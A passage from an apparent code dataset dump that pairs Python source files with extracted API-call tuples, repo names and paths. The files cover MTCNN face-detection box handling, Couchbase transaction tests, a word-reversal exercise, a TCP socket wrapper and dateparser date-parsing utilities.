previous_stage_predictions[0].remove(removed_boxes)
previous_stage_predictions[0].scores = score[pass_t]
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
region_out = outputs_mapping['region_out']
if region_out not in out[0]:
region_out = (
region_out + '/sink_port_0' if '/sink_port_0' not in region_out else region_out.replace('/sink_port_0', '')
)
mv = out[0][region_out][pass_t]
if iou_type:
previous_stage_predictions[0], peek = nms(previous_stage_predictions[0], threshold, iou_type)
bboxes = np.c_[
previous_stage_predictions[0].x_mins, previous_stage_predictions[0].y_mins,
previous_stage_predictions[0].x_maxs, previous_stage_predictions[0].y_maxs,
previous_stage_predictions[0].scores
]
mv = mv[np.sort(peek).astype(int)]
x_mins, y_mins, x_maxs, y_maxs, _ = bbreg(bboxes, mv.T).T
previous_stage_predictions[0].x_mins = x_mins
previous_stage_predictions[0].y_mins = y_mins
previous_stage_predictions[0].x_maxs = x_maxs
previous_stage_predictions[0].y_maxs = y_maxs
return previous_stage_predictions
def nms(prediction, threshold, iou_type):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
peek = MTCNNPAdapter.nms(bboxes, threshold, iou_type)
prediction.remove([i for i in range(prediction.size) if i not in peek])
return prediction, peek
def bbreg(boundingbox, reg):
reg = reg.T
# calibrate bounding boxes
w = boundingbox[:, 2] - boundingbox[:, 0] + 1
h = boundingbox[:, 3] - boundingbox[:, 1] + 1
bb0 = boundingbox[:, 0] + reg[:, 0] * w
bb1 = boundingbox[:, 1] + reg[:, 1] * h
bb2 = boundingbox[:, 2] + reg[:, 2] * w
bb3 = boundingbox[:, 3] + reg[:, 3] * h
boundingbox[:, 0:4] = np.array([bb0, bb1, bb2, bb3]).T
return boundingbox
def filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph):
mask = np.ones(len(tmph))
tmp_ys_len = (edy + 1) - dy
tmp_xs_len = (edx + 1) - dx
img_ys_len = (ey + 1) - y
img_xs_len = (ex + 1) - x
mask = np.logical_and(mask, np.logical_and(tmph > 0, tmpw > 0))
mask = np.logical_and(mask, np.logical_and(tmp_ys_len > 0, tmp_xs_len > 0))
mask = np.logical_and(mask, np.logical_and(img_xs_len > 0, img_ys_len > 0))
mask = np.logical_and(mask, np.logical_and(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len))
return dy[mask], edy[mask], dx[mask], edx[mask], y[mask], ey[mask], x[mask], ex[mask], tmpw[mask], tmph[mask], mask
def pad(boxesA, h, w):
boxes = boxesA.copy()
tmph = boxes[:, 3] - boxes[:, 1] + 1
tmpw = boxes[:, 2] - boxes[:, 0] + 1
numbox = boxes.shape[0]
dx = np.ones(numbox)
dy = np.ones(numbox)
edx = tmpw
edy = tmph
x = boxes[:, 0:1][:, 0]
y = boxes[:, 1:2][:, 0]
ex = boxes[:, 2:3][:, 0]
ey = boxes[:, 3:4][:, 0]
tmp = np.where(ex > w)[0]
if tmp.shape[0] != 0:
edx[tmp] = -ex[tmp] + w - 1 + tmpw[tmp]
ex[tmp] = w - 1
tmp = np.where(ey > h)[0]
if tmp.shape[0] != 0:
edy[tmp] = -ey[tmp] + h - 1 + tmph[tmp]
ey[tmp] = h - 1
tmp = np.where(x < 1)[0]
if tmp.shape[0] != 0:
dx[tmp] = 2 - x[tmp]
x[tmp] = np.ones_like(x[tmp])
tmp = np.where(y < 1)[0]
if tmp.shape[0] != 0:
dy[tmp] = 2 - y[tmp]
y[tmp] = np.ones_like(y[tmp])
# for python index from 0, while matlab from 1
dy, dx = np.maximum(0, dy - 1), np.maximum(0, dx - 1)
y = np.maximum(0, y - 1)
x = np.maximum(0, x - 1)
edy = np.maximum(0, edy - 1)
edx = np.maximum(0, edx - 1)
ey = np.maximum(0, ey - 1)
ex = np.maximum(0, ex - 1)
return filter_valid(dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph)
def rerec(bboxA):
w = bboxA[:, 2] - bboxA[:, 0]
h = bboxA[:, 3] - bboxA[:, 1]
max_side = np.maximum(w, h).T
bboxA[:, 0] = bboxA[:, 0] + w * 0.5 - max_side * 0.5
bboxA[:, 1] = bboxA[:, 1] + h * 0.5 - max_side * 0.5
bboxA[:, 2:4] = bboxA[:, 0:2] + np.repeat([max_side], 2, axis=0).T
return bboxA
def cut_roi(image, prediction, dst_size, include_bound=True):
bboxes = np.c_[prediction.x_mins, prediction.y_mins, prediction.x_maxs, prediction.y_maxs, prediction.scores]
img = image.data
bboxes = rerec(bboxes)
bboxes[:, 0:4] = np.fix(bboxes[:, 0:4])
dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph, mask = pad(bboxes, *img.shape[:2])
bboxes = bboxes[mask]
numbox = bboxes.shape[0]
tempimg = np.zeros((numbox, dst_size, dst_size, 3))
for k in range(numbox):
tmp_k_h, tmp_k_w = int(tmph[k]) + int(include_bound), int(tmpw[k]) + int(include_bound)
tmp = np.zeros((tmp_k_h, tmp_k_w, 3))
tmp_ys, tmp_xs = slice(int(dy[k]), int(edy[k]) + 1), slice(int(dx[k]), int(edx[k]) + 1)
img_ys, img_xs = slice(int(y[k]), int(ey[k]) + 1), slice(int(x[k]), int(ex[k]) + 1)
tmp[tmp_ys, tmp_xs] = img[img_ys, img_xs]
tempimg[k, :, :, :] = cv2.resize(tmp, (dst_size, dst_size))
image.data = tempimg
return image
def transform_for_callback(batch_size, raw_outputs):
output_per_box = []
fq_weights = []
for i in range(batch_size):
box_outs = OrderedDict()
for layer_name, data in raw_outputs[0].items():
if layer_name in fq_weights:
continue
if layer_name.endswith('fq_weights_1'):
fq_weights.append(layer_name)
box_outs[layer_name] = data
elif data.shape[0] <= i:
box_outs[layer_name] = data
else:
box_outs[layer_name] = np.expand_dims(data[i], axis=0)
output_per_box.append(box_outs)
return output_per_box
| [((98, 9, 98, 24), 'numpy.ones', 'np.ones', ({(98, 17, 98, 23): 'numbox'}, {}), '(numbox)', True, 'import numpy as np\n'), ((99, 9, 99, 24), 'numpy.ones', 'np.ones', ({(99, 17, 99, 23): 'numbox'}, {}), '(numbox)', True, 'import numpy as np\n'), ((124, 8, 124, 28), 'numpy.maximum', 'np.maximum', ({(124, 19, 124, 20): '0', (124, 22, 124, 27): 'y - 1'}, {}), '(0, y - 1)', True, 'import numpy as np\n'), ((125, 8, 125, 28), 'numpy.maximum', 'np.maximum', ({(125, 19, 125, 20): '0', (125, 22, 125, 27): 'x - 1'}, {}), '(0, x - 1)', True, 'import numpy as np\n'), ((126, 10, 126, 32), 'numpy.maximum', 'np.maximum', ({(126, 21, 126, 22): '0', (126, 24, 126, 31): 'edy - 1'}, {}), '(0, edy - 1)', True, 'import numpy as np\n'), ((127, 10, 127, 32), 'numpy.maximum', 'np.maximum', ({(127, 21, 127, 22): '0', (127, 24, 127, 31): 'edx - 1'}, {}), '(0, edx - 1)', True, 'import numpy as np\n'), ((128, 9, 128, 30), 'numpy.maximum', 'np.maximum', ({(128, 20, 128, 21): '0', (128, 23, 128, 29): 'ey - 1'}, {}), '(0, ey - 1)', True, 'import numpy as np\n'), ((129, 9, 129, 30), 'numpy.maximum', 'np.maximum', ({(129, 20, 129, 21): '0', (129, 23, 129, 29): 'ex - 1'}, {}), '(0, ex - 1)', True, 'import numpy as np\n'), ((147, 21, 147, 43), 'numpy.fix', 'np.fix', ({(147, 28, 147, 42): 'bboxes[:, 0:4]'}, {}), '(bboxes[:, 0:4])', True, 'import numpy as np\n'), ((151, 14, 151, 55), 'numpy.zeros', 'np.zeros', ({(151, 23, 151, 54): '(numbox, dst_size, dst_size, 3)'}, {}), '((numbox, dst_size, dst_size, 3))', True, 'import numpy as np\n'), ((29, 13, 29, 34), 'numpy.where', 'np.where', ({(29, 22, 29, 33): '(score > 0.7)'}, {}), '(score > 0.7)', True, 'import numpy as np\n'), ((76, 26, 76, 56), 'numpy.array', 'np.array', ({(76, 35, 76, 55): '[bb0, bb1, bb2, bb3]'}, {}), '([bb0, bb1, bb2, bb3])', True, 'import numpy as np\n'), ((86, 32, 86, 66), 'numpy.logical_and', 'np.logical_and', ({(86, 47, 86, 55): 'tmph > 0', (86, 57, 86, 65): 'tmpw > 0'}, {}), '(tmph > 0, tmpw > 0)', True, 'import numpy as np\n'), ((87, 32, 87, 78), 'numpy.logical_and', 'np.logical_and', ({(87, 47, 87, 61): 'tmp_ys_len > 0', (87, 63, 87, 77): 'tmp_xs_len > 0'}, {}), '(tmp_ys_len > 0, tmp_xs_len > 0)', True, 'import numpy as np\n'), ((88, 32, 88, 78), 'numpy.logical_and', 'np.logical_and', ({(88, 47, 88, 61): 'img_xs_len > 0', (88, 63, 88, 77): 'img_ys_len > 0'}, {}), '(img_xs_len > 0, img_ys_len > 0)', True, 'import numpy as np\n'), ((89, 32, 89, 98), 'numpy.logical_and', 'np.logical_and', ({(89, 47, 89, 71): 'tmp_xs_len == img_xs_len', (89, 73, 89, 97): 'tmp_ys_len == img_ys_len'}, {}), '(tmp_xs_len == img_xs_len, tmp_ys_len == img_ys_len)', True, 'import numpy as np\n'), ((106, 10, 106, 26), 'numpy.where', 'np.where', ({(106, 19, 106, 25): '(ex > w)'}, {}), '(ex > w)', True, 'import numpy as np\n'), ((110, 10, 110, 26), 'numpy.where', 'np.where', ({(110, 19, 110, 25): '(ey > h)'}, {}), '(ey > h)', True, 'import numpy as np\n'), ((114, 10, 114, 25), 'numpy.where', 'np.where', ({(114, 19, 114, 24): '(x < 1)'}, {}), '(x < 1)', True, 'import numpy as np\n'), ((117, 17, 117, 37), 'numpy.ones_like', 'np.ones_like', ({(117, 30, 117, 36): 'x[tmp]'}, {}), '(x[tmp])', True, 'import numpy as np\n'), ((118, 10, 118, 25), 'numpy.where', 'np.where', ({(118, 19, 118, 24): '(y < 1)'}, {}), '(y < 1)', True, 'import numpy as np\n'), ((121, 17, 121, 37), 'numpy.ones_like', 'np.ones_like', ({(121, 30, 121, 36): 'y[tmp]'}, {}), '(y[tmp])', True, 'import numpy as np\n'), ((123, 13, 123, 34), 'numpy.maximum', 'np.maximum', ({(123, 24, 123, 25): '(0)', (123, 27, 123, 33): '(dy - 1)'}, {}), '(0, dy - 1)', True, 'import numpy as np\n'), ((123, 36, 123, 57), 'numpy.maximum', 'np.maximum', ({(123, 47, 123, 48): '(0)', (123, 50, 123, 56): '(dx - 1)'}, {}), '(0, dx - 1)', True, 'import numpy as np\n'), ((136, 15, 136, 31), 'numpy.maximum', 'np.maximum', ({(136, 26, 136, 27): 'w', (136, 29, 136, 30): 'h'}, {}), '(w, h)', True, 'import numpy as np\n'), ((154, 14, 154, 45), 'numpy.zeros', 'np.zeros', ({(154, 23, 154, 44): '(tmp_k_h, tmp_k_w, 3)'}, {}), '((tmp_k_h, tmp_k_w, 3))', True, 'import numpy as np\n'), ((158, 30, 158, 67), 'cv2.resize', 'cv2.resize', ({(158, 41, 158, 44): 'tmp', (158, 46, 158, 66): '(dst_size, dst_size)'}, {}), '(tmp, (dst_size, dst_size))', False, 'import cv2\n'), ((167, 19, 167, 32), 'collections.OrderedDict', 'OrderedDict', ({}, {}), '()', False, 'from collections import OrderedDict\n'), ((139, 36, 139, 68), 'numpy.repeat', 'np.repeat', (), '', True, 'import numpy as np\n'), ((177, 39, 177, 70), 'numpy.expand_dims', 'np.expand_dims', (), '', True, 'import numpy as np\n'), ((51, 16, 51, 29), 'numpy.sort', 'np.sort', ({(51, 24, 51, 28): 'peek'}, {}), '(peek)', True, 'import numpy as np\n')] |
ashwin2002/TAF | pytests/Atomicity/basic_ops.py | 4223787a1f4c0fe9fa841543020b48ada9ade9e3 | from Cb_constants import DocLoading
from basetestcase import ClusterSetup
from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator
from couchbase_helper.tuq_generators import JsonGenerator
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
from com.couchbase.client.java.json import JsonObject
"""
Basic test cases with commit,rollback scenarios
"""
class basic_ops(ClusterSetup):
def setUp(self):
super(basic_ops, self).setUp()
if self.num_buckets:
self.bucket_util.create_multiple_buckets(
self.cluster.master,
self.num_replicas,
bucket_count=self.num_buckets,
bucket_type=self.bucket_type,
ram_quota=self.bucket_size,
storage=self.bucket_storage,
eviction_policy=self.bucket_eviction_policy)
else:
self.create_bucket()
self.sleep(10, "Wait for bucket to become ready for ops")
# Reset active_resident_threshold to avoid further data load as DGM
self.active_resident_threshold = 0
self.log.info("==========Finished Basic_ops base setup========")
def tearDown(self):
super(basic_ops, self).tearDown()
def get_doc_generator(self, start, end):
age = range(5)
first = ['james', 'sharon']
body = [''.rjust(self.doc_size - 10, 'a')]
template = JsonObject.create()
template.put("age", None)
template.put("first_name", None)
template.put("body", None)
generator = DocumentGenerator(self.key, template, randomize=True,
age=age,
first_name=first, body=body,
start=start, end=end,
key_size=self.key_size,
doc_size=self.doc_size,
doc_type=self.doc_type)
return generator
@staticmethod
def generate_docs_bigdata(docs_per_day, start=0, document_size=1024000):
json_generator = JsonGenerator()
return json_generator.generate_docs_bigdata(end=docs_per_day,
start=start,
value_size=document_size)
def test_basic_commit(self):
"""
Test transaction commit, rollback, time ahead,
time behind scenarios with replica, persist_to and
replicate_to settings
"""
# Atomicity.basic_ops.basic_ops.test_basic_commit
self.drift_ahead = self.input.param("drift_ahead", False)
self.drift_behind = self.input.param("drift_behind", False)
gen_create = self.get_doc_generator(0, self.num_items)
self.op_type = self.input.param("op_type", 'create')
if self.drift_ahead:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
self.log.info('Date after is set forward {0}'.format(output))
if self.drift_behind:
shell = RemoteMachineShellConnection(self.servers[0])
self.assertTrue(shell.change_system_time(-3600),
'Failed to advance the clock')
output, _ = shell.execute_command('date')
self.log.info('Date after is set behind {0}'.format(output))
self.log.info("Loading docs using AtomicityTask")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, self.op_type, exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
if self.op_type == "time_out":
self.sleep(90, "Wait for staged docs to get cleared")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries, update_count=self.update_count,
transaction_timeout=200,
commit=self.transaction_commit,
durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.task_manager.get_task_result(task)
def test_large_doc_size_commit(self):
gen_create = self.generate_docs_bigdata(docs_per_day=self.num_items,
document_size=self.doc_size)
self.log.info("going to create a task")
task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
gen_create, "create", exp=0,
batch_size=10,
process_concurrency=self.process_concurrency,
replicate_to=self.replicate_to,
persist_to=self.persist_to, timeout_secs=self.sdk_timeout,
retries=self.sdk_retries,
transaction_timeout=self.transaction_timeout,
commit=self.transaction_commit, durability=self.durability_level,
sync=self.sync, defer=self.defer)
self.log.info("going to execute the task")
self.task.jython_task_manager.get_task_result(task)
def test_MB_41944(self):
num_index = self.input.param("num_index", 1)
# Create doc_gen for loading
doc_gen = doc_generator(self.key, 0, 1)
# Get key for delete op and reset the gen
key, v = doc_gen.next()
doc_gen.reset()
# Open SDK client connection
client = SDKClient([self.cluster.master], self.bucket_util.buckets[0])
query = list()
query.append("CREATE PRIMARY INDEX index_0 on %s USING GSI"
% self.bucket_util.buckets[0].name)
if num_index == 2:
query.append("CREATE INDEX index_1 on %s(name,age) "
"WHERE mutated=0 USING GSI"
% self.bucket_util.buckets[0].name)
# Create primary index on the bucket
for q in query:
client.cluster.query(q)
# Wait for index to become online`
for index, _ in enumerate(query):
query = "SELECT state FROM system:indexes WHERE name='index_%s'" \
% index
index = 0
state = None
while index < 30:
state = client.cluster.query(query) \
.rowsAsObject()[0].get("state")
if state == "online":
break
self.sleep(1)
if state != "online":
self.log_failure("Index 'index_%s' not yet online" % index)
# Start transaction to create the doc
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Perform sub_doc operation on same key
_, fail = client.crud(DocLoading.Bucket.SubDocOps.INSERT,
key=key, value=["_sysxattr", "sysxattr-payload"],
xattr=True)
if fail:
self.log_failure("Subdoc insert failed: %s" % fail)
else:
self.log.info("Subdoc insert success")
# Delete the created doc
result = client.crud(DocLoading.Bucket.DocOps.DELETE, key)
if result["status"] is False:
self.log_failure("Doc delete failed: %s" % result["error"])
else:
self.log.info("Document deleted")
# Re-insert same doc through transaction
trans_task = self.task.async_load_gen_docs_atomicity(
self.cluster, self.bucket_util.buckets,
doc_gen, DocLoading.Bucket.DocOps.CREATE)
self.task_manager.get_task_result(trans_task)
# Close SDK Client connection
client.close()
self.validate_test_failure()
| [((44, 19, 44, 38), 'com.couchbase.client.java.json.JsonObject.create', 'JsonObject.create', ({}, {}), '()', False, 'from com.couchbase.client.java.json import JsonObject\n'), ((48, 20, 54, 61), 'couchbase_helper.documentgenerator.DocumentGenerator', 'DocumentGenerator', (), '', False, 'from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator\n'), ((59, 25, 59, 40), 'couchbase_helper.tuq_generators.JsonGenerator', 'JsonGenerator', ({}, {}), '()', False, 'from couchbase_helper.tuq_generators import JsonGenerator\n'), ((145, 18, 145, 47), 'couchbase_helper.documentgenerator.doc_generator', 'doc_generator', ({(145, 32, 145, 40): 'self.key', (145, 42, 145, 43): '0', (145, 45, 145, 46): '1'}, {}), '(self.key, 0, 1)', False, 'from couchbase_helper.documentgenerator import DocumentGenerator, doc_generator\n'), ((152, 17, 152, 78), 'sdk_client3.SDKClient', 'SDKClient', ({(152, 27, 152, 48): '[self.cluster.master]', (152, 50, 152, 77): 'self.bucket_util.buckets[0]'}, {}), '([self.cluster.master], self.bucket_util.buckets[0])', False, 'from sdk_client3 import SDKClient\n'), ((77, 20, 77, 65), 'remote.remote_util.RemoteMachineShellConnection', 'RemoteMachineShellConnection', ({(77, 49, 77, 64): 'self.servers[0]'}, {}), '(self.servers[0])', False, 'from remote.remote_util import RemoteMachineShellConnection\n'), ((85, 20, 85, 65), 'remote.remote_util.RemoteMachineShellConnection', 'RemoteMachineShellConnection', ({(85, 49, 85, 64): 'self.servers[0]'}, {}), '(self.servers[0])', False, 'from remote.remote_util import RemoteMachineShellConnection\n')] |
lovefov/Python | reverseWord.py | ba8fc49e6e503927dc1f827f37b77f3e43b5d0c8 | #!/usr/bin/env python3
#-*- coding:utf-8 -*-
#Author:贾江超
def spin_words(sentence):
list1=sentence.split()
l=len(list1)
for i in range(l):
relen = len(sentence.split()[i:][0])
if relen > 5:
list1[i]=list1[i][::-1]
return ' '.join(list1)
'''
注意 在2.x版本可以用len()得到list的长度 3.x版本就不行了
优化版本
def spin_words(sentence):
# Your code goes here
return " ".join([x[::-1] if len(x) >= 5 else x for x in sentence.split(" ")])
在这里倒序字符串用切片很方便 str[::-1] 就ok了
'''
| [] |
south-coast-science/scs_host_cpc | src/scs_host/comms/network_socket.py | 08b4a28c022936462b60823cca136ba6746eac57 | """
Created on 30 May 2017
@author: Bruno Beloff ([email protected])
A network socket abstraction, implementing ProcessComms
"""
import socket
import time
from scs_core.sys.process_comms import ProcessComms
# --------------------------------------------------------------------------------------------------------------------
class NetworkSocket(ProcessComms):
"""
classdocs
"""
__TIMEOUT = 4.0 # seconds
__BUFFER_SIZE = 1024 # bytes
__BACKLOG = 5
__ACK = "ACK"
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, host, port=2000): # a receiving socket should have host ''
"""
Constructor
"""
self.__address = (host, port)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.__conn = None
# ----------------------------------------------------------------------------------------------------------------
def connect(self, wait_for_availability=True):
while True:
try:
self.__socket.connect(self.__address)
break
except ConnectionRefusedError as ex:
if not wait_for_availability:
raise ConnectionRefusedError(ex)
time.sleep(0.1)
def close(self):
try:
if self.__conn:
self.__conn.close()
except RuntimeError:
pass
try:
self.__socket.close()
except RuntimeError:
pass
# ----------------------------------------------------------------------------------------------------------------
def read(self):
# socket...
self.__socket.bind(self.__address)
self.__socket.listen(NetworkSocket.__BACKLOG)
self.__conn, _ = self.__socket.accept()
# data...
while True:
message = self.__conn.recv(NetworkSocket.__BUFFER_SIZE).decode().strip()
if len(message) == 0:
break
yield message
def write(self, message, wait_for_availability=True):
while True:
try:
# data...
self.__socket.send(message.encode())
# wait for ACK...
timeout = time.time() + NetworkSocket.__TIMEOUT
while self.__socket.recv(NetworkSocket.__BUFFER_SIZE).decode() != NetworkSocket.__ACK:
time.sleep(0.001)
if time.time() > timeout:
break
break
except ConnectionError:
if not wait_for_availability:
raise
self.close()
time.sleep(0.1)
self.__socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
self.connect()
# ----------------------------------------------------------------------------------------------------------------
def ack(self):
self.__conn.send(str(NetworkSocket.__ACK).encode())
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "NetworkSocket:{address:%s, socket:%s}" % (self.__address, self.__socket)
| [((37, 24, 37, 85), 'socket.socket', 'socket.socket', (), '', False, 'import socket\n'), ((53, 16, 53, 31), 'time.sleep', 'time.sleep', ({(53, 27, 53, 30): '(0.1)'}, {}), '(0.1)', False, 'import time\n'), ((95, 26, 95, 37), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((98, 20, 98, 37), 'time.sleep', 'time.sleep', ({(98, 31, 98, 36): '(0.001)'}, {}), '(0.001)', False, 'import time\n'), ((111, 16, 111, 31), 'time.sleep', 'time.sleep', ({(111, 27, 111, 30): '(0.1)'}, {}), '(0.1)', False, 'import time\n'), ((113, 32, 113, 93), 'socket.socket', 'socket.socket', (), '', False, 'import socket\n'), ((100, 23, 100, 34), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
JKhakpour/dateparser | dateparser/date.py | 7f324cfd3de04e91752979cf65ae0dedc622375f | # -*- coding: utf-8 -*-
import calendar
import collections
from datetime import datetime, timedelta
from warnings import warn
import six
import regex as re
from dateutil.relativedelta import relativedelta
from dateparser.date_parser import date_parser
from dateparser.freshness_date_parser import freshness_date_parser
from dateparser.languages.loader import LanguageDataLoader
from dateparser.languages.detection import AutoDetectLanguage, ExactLanguages
from dateparser.conf import apply_settings
from dateparser.utils import normalize_unicode, apply_timezone_from_settings
APOSTROPHE_LOOK_ALIKE_CHARS = [
u'\N{RIGHT SINGLE QUOTATION MARK}', # u'\u2019'
u'\N{MODIFIER LETTER APOSTROPHE}', # u'\u02bc'
u'\N{MODIFIER LETTER TURNED COMMA}', # u'\u02bb'
u'\N{ARMENIAN APOSTROPHE}', # u'\u055a'
u'\N{LATIN SMALL LETTER SALTILLO}', # u'\ua78c'
u'\N{PRIME}', # u'\u2032'
u'\N{REVERSED PRIME}', # u'\u2035'
u'\N{MODIFIER LETTER PRIME}', # u'\u02b9'
u'\N{FULLWIDTH APOSTROPHE}', # u'\uff07'
]
RE_NBSP = re.compile(u'\xa0', flags=re.UNICODE)
RE_SPACES = re.compile(r'\s+')
RE_TRIM_SPACES = re.compile(r'^\s+(\S.*?)\s+$')
RE_SANITIZE_SKIP = re.compile(r'\t|\n|\r|\u00bb|,\s\u0432|\u200e|\xb7|\u200f|\u064e|\u064f', flags=re.M)
RE_SANITIZE_RUSSIAN = re.compile(r'([\W\d])\u0433\.', flags=re.I | re.U)
RE_SANITIZE_AMPM = re.compile(r'\b([ap])(\.)?m(\.)?\b', flags=re.DOTALL | re.I)
RE_SANITIZE_ON = re.compile(r'^.*?on:\s+(.*)')
RE_SANITIZE_APOSTROPHE = re.compile(u'|'.join(APOSTROPHE_LOOK_ALIKE_CHARS))
RE_SEARCH_TIMESTAMP = re.compile(r'^\d{10}(?![^\d.])')
def sanitize_spaces(html_string):
html_string = RE_NBSP.sub(' ', html_string)
html_string = RE_SPACES.sub(' ', html_string)
html_string = RE_TRIM_SPACES.sub(r'\1', html_string)
return html_string
def date_range(begin, end, **kwargs):
dateutil_error_prone_args = ['year', 'month', 'week', 'day', 'hour',
'minute', 'second']
for arg in dateutil_error_prone_args:
if arg in kwargs:
raise ValueError("Invalid argument: %s" % arg)
step = relativedelta(**kwargs) if kwargs else relativedelta(days=1)
date = begin
while date < end:
yield date
date += step
# handles edge-case when iterating months and last interval is < 30 days
if kwargs.get('months', 0) > 0 and (date.year, date.month) == (end.year, end.month):
yield end
def get_intersecting_periods(low, high, period='day'):
if period not in ['year', 'month', 'week', 'day', 'hour', 'minute', 'second', 'microsecond']:
raise ValueError("Invalid period: {}".format(period))
if high <= low:
return
step = relativedelta(**{period + 's': 1})
current_period_start = low
if isinstance(current_period_start, datetime):
reset_arguments = {}
for test_period in ['microsecond', 'second', 'minute', 'hour']:
if test_period == period:
break
else:
reset_arguments[test_period] = 0
current_period_start = current_period_start.replace(**reset_arguments)
if period == 'week':
current_period_start \
= current_period_start - timedelta(days=current_period_start.weekday())
elif period == 'month':
current_period_start = current_period_start.replace(day=1)
elif period == 'year':
current_period_start = current_period_start.replace(month=1, day=1)
while current_period_start < high:
yield current_period_start
current_period_start += step
def sanitize_date(date_string):
date_string = RE_SANITIZE_SKIP.sub(' ', date_string)
date_string = RE_SANITIZE_RUSSIAN.sub(r'\1 ', date_string) # remove u'г.' (Russian for year) but not in words
date_string = sanitize_spaces(date_string)
date_string = RE_SANITIZE_AMPM.sub(r'\1m', date_string)
date_string = RE_SANITIZE_ON.sub(r'\1', date_string)
date_string = RE_SANITIZE_APOSTROPHE.sub(u"'", date_string)
return date_string
def get_date_from_timestamp(date_string, settings):
if RE_SEARCH_TIMESTAMP.search(date_string):
date_obj = datetime.fromtimestamp(int(date_string[:10]))
date_obj = apply_timezone_from_settings(date_obj, settings)
return date_obj
def get_last_day_of_month(year, month):
return calendar.monthrange(year, month)[1]
def parse_with_formats(date_string, date_formats, settings):
""" Parse with formats and return a dictionary with 'period' and 'obj_date'.
:returns: :class:`datetime.datetime`, dict or None
"""
period = 'day'
for date_format in date_formats:
try:
date_obj = datetime.strptime(date_string, date_format)
except ValueError:
continue
else:
# If format does not include the day, use last day of the month
# instead of first, because the first is usually out of range.
if '%d' not in date_format:
period = 'month'
date_obj = date_obj.replace(
day=get_last_day_of_month(date_obj.year, date_obj.month))
if not ('%y' in date_format or '%Y' in date_format):
today = datetime.today()
date_obj = date_obj.replace(year=today.year)
date_obj = apply_timezone_from_settings(date_obj, settings)
return {'date_obj': date_obj, 'period': period}
else:
return {'date_obj': None, 'period': period}
class _DateLanguageParser(object):
DATE_FORMATS_ERROR_MESSAGE = "Date formats should be list, tuple or set of strings"
def __init__(self, language, date_string, date_formats, settings=None):
self._settings = settings
if isinstance(date_formats, six.string_types):
warn(self.DATE_FORMATS_ERROR_MESSAGE, FutureWarning)
date_formats = [date_formats]
elif not (date_formats is None or isinstance(date_formats, (list, tuple, collections.Set))):
raise TypeError(self.DATE_FORMATS_ERROR_MESSAGE)
self.language = language
self.date_string = date_string
self.date_formats = date_formats
self._translated_date = None
self._translated_date_with_formatting = None
@classmethod
def parse(cls, language, date_string, date_formats=None, settings=None):
instance = cls(language, date_string, date_formats, settings)
return instance._parse()
def _parse(self):
for parser in (
self._try_timestamp,
self._try_freshness_parser,
self._try_given_formats,
self._try_parser,
self._try_hardcoded_formats,
):
date_obj = parser()
if self._is_valid_date_obj(date_obj):
return date_obj
else:
return None
def _try_timestamp(self):
return {
'date_obj': get_date_from_timestamp(self.date_string, self._settings),
'period': 'day',
}
def _try_freshness_parser(self):
return freshness_date_parser.get_date_data(self._get_translated_date(), self._settings)
def _try_parser(self):
_order = self._settings.DATE_ORDER
try:
if self._settings.PREFER_LANGUAGE_DATE_ORDER:
self._settings.DATE_ORDER = self.language.info.get('dateorder', _order)
date_obj, period = date_parser.parse(
self._get_translated_date(), settings=self._settings)
self._settings.DATE_ORDER = _order
return {
'date_obj': date_obj,
'period': period,
}
except ValueError:
self._settings.DATE_ORDER = _order
return None
def _try_given_formats(self):
if not self.date_formats:
return
return parse_with_formats(
self._get_translated_date_with_formatting(),
self.date_formats, settings=self._settings
)
def _try_hardcoded_formats(self):
hardcoded_date_formats = [
'%B %d, %Y, %I:%M:%S %p',
'%b %d, %Y at %I:%M %p',
'%d %B %Y %H:%M:%S',
'%A, %B %d, %Y',
'%Y-%m-%dT%H:%M:%S.%fZ'
]
try:
return parse_with_formats(
self._get_translated_date_with_formatting(),
hardcoded_date_formats,
settings=self._settings
)
except TypeError:
return None
def _get_translated_date(self):
if self._translated_date is None:
self._translated_date = self.language.translate(
self.date_string, keep_formatting=False, settings=self._settings)
return self._translated_date
def _get_translated_date_with_formatting(self):
if self._translated_date_with_formatting is None:
self._translated_date_with_formatting = self.language.translate(
self.date_string, keep_formatting=True, settings=self._settings)
return self._translated_date_with_formatting
def _is_valid_date_obj(self, date_obj):
if not isinstance(date_obj, dict):
return False
if len(date_obj) != 2:
return False
if 'date_obj' not in date_obj or 'period' not in date_obj:
return False
if not date_obj['date_obj']:
return False
if date_obj['period'] not in ('day', 'week', 'month', 'year'):
return False
return True
